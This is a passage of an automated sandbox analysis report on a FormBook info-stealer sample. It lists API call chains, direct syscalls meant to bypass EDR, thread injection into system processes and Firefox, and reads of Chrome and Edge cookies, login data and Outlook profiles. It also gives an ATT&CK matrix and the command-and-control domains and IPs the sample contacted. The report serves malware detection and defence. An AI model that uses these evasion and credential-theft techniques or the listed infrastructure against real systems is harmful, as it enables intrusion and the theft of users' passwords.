            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F60B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00F60B62
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F32622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F32622
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F2083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F2083F
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F209D5 SetUnhandledExceptionFilter,0_2_00F209D5
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F20C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F20C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 8040Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO_987654345678.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 234008Jump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F61201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F61201
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F42BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F42BA5
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6B226 SendInput,keybd_event,0_2_00F6B226
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00F822DA
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO_987654345678.exe"Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F60B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00F60B62
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F61663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F61663
            Source: PO_987654345678.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: PO_987654345678.exe, ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: ftfqgrfncDSuar.exe, 00000002.00000000.1771342351.0000000001181000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4118230019.0000000001180000.00000002.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118432938.00000000019A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F20698 cpuid 0_2_00F20698
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F78195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00F78195
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F5D27A GetUserNameW,0_2_00F5D27A
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F3BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F3BB6F
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F042DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO_987654345678.exeBinary or memory string: WIN_81
            Source: PO_987654345678.exeBinary or memory string: WIN_XP
            Source: PO_987654345678.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO_987654345678.exeBinary or memory string: WIN_XPe
            Source: PO_987654345678.exeBinary or memory string: WIN_VISTA
            Source: PO_987654345678.exeBinary or memory string: WIN_7
            Source: PO_987654345678.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F81204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00F81204
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F81806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F81806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503298 Sample: PO_987654345678.exe Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 28 www.golbasi-nakliyat.xyz 2->28 30 www.asian-massage-us.xyz 2->30 32 20 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 PO_987654345678.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 ftfqgrfncDSuar.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 chkntfs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 ftfqgrfncDSuar.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.dfbio.net 218.247.68.184, 65007, 65008, 65009 WEST263GO-HKWest263InternationalLimitedHK China 22->34 36 www.fineg.online 162.0.239.141, 64987, 64988, 64989 NAMECHEAP-NETUS Canada 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO_987654345678.exe37%VirustotalBrowse
            PO_987654345678.exe42%ReversingLabsWin32.Trojan.Strab
            PO_987654345678.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            aflaksokna.com0%VirustotalBrowse
            d55dg.top0%VirustotalBrowse
            www.healthsolutions.top1%VirustotalBrowse
            www.asian-massage-us.xyz1%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.d55dg.top1%VirustotalBrowse
            www.esistiliya.online0%VirustotalBrowse
            www.arlon-commerce.com0%VirustotalBrowse
            www.950021.com0%VirustotalBrowse
            www.begumnasreenbano.com0%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            www.myim.cloud0%VirustotalBrowse
            www.aflaksokna.com0%VirustotalBrowse
            206.23.85.13.in-addr.arpa1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
